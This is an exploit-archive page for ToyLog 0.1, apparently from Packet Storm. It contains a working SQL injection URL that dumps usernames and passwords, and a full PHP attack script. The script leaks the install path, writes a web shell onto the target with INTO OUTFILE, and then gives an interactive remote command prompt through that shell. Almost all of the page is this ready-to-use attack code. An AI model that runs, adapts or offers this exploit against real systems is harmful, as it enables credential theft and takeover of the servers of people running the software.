exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ToyLog 0.1 SQL Injection / Code Execution

ToyLog 0.1 SQL Injection / Code Execution
Posted Jul 10, 2009
Authored by darkjoker | Site darkjokerside.altervista.org

ToyLog version 0.1 remote SQL injection and command execution exploit.

tags | exploit, remote, sql injection
SHA-256 | 55523e991afbbbdf369376cec07196c899c0ea0a96b4135234103551debccb8c

ToyLog 0.1 SQL Injection / Code Execution

Change Mirror Download
--+++=====================================================================================+++--
--+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++--
--+++=====================================================================================+++--

[+] SQL Injection Vulnerability
Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user

[+] Remote Command Execution Exploit

#!/usr/bin/php
<?php

function usage () {
exit ( "\n".
"+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n".
"- -\n".
"+ ToyLog 0.1 Remote Command Execution Exploit +\n".
"- Author : darkjoker -\n".
"+ Site : http://darkjoker.net23.net +\n".
"- Download: http://sourceforge.net/projects/toylog/ -\n".
"+ Usage : php xpl.php <url> +\n".
"- Ex. : php xpl.php http://localhost/ToyLog/ -\n".
"+ +\n".
"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
"\n");
}

function hex_format ($string) {
$i=0;
while ($i<strlen($string))
$hex .= "%".dechex(ord($string[$i++]));
return $hex;
}

function get_path ($host, $dir) {
$fp = fsockopen ($host, 80);
$query = hex_format ("1 UNION ALL SELECT * FROM does_not_exist");
$req = "GET {$dir}read.php?idm={$query} HTTP/1.1\r\n".
"Host: {$host}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $req);
while (!feof ($fp))
if (preg_match ("|resource in <b>(.+?)</b> on|", fgets ($fp, 1024), $data))
$path = $data [1];
list ($path) = explode ("block/db.php", $path);
fclose ($fp);
return $path;
}

function upload_shell ($host, $dir) {
$fp = fsockopen ($host, 80);
$shell_path = get_path ($host, $dir)."shell.php";
if (!strcmp ($shell_path, "shell.php"))
die ("[-] Exploit failed.\n");
$query = hex_format('1 UNION ALL SELECT 1,2,\'xxx<?php system (stripslashes($_GET[\\\'cmd\\\'])); ?>xxx\',4 INTO OUTFILE \''.$shell_path.'\' FROM post');
$req = "GET {$dir}read.php?idm={$query} HTTP/1.1\r\n".
"Host: {$host}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $req);
fclose ($fp);
}

if (!preg_match ("|http://(.+?)(/.+/)|", $argv [1], $data))
usage ();
array_shift ($data);
list ($host, $dir) = $data;
upload_shell ($host, $dir);
$stdin = fopen ("php://stdin", "r");
while (1) {
echo "backdoor@{$host}: ";
$cmd = hex_format(trim (fgets ($stdin, 1024)));
if (!strcmp ($cmd, hex_format("exit")))
break;
$out = explode ("xxx", file_get_contents ("http://{$host}{$dir}shell.php?cmd={$cmd}"));
array_shift ($out);
array_pop ($out);
echo $out [0];
}

?>

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    7 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close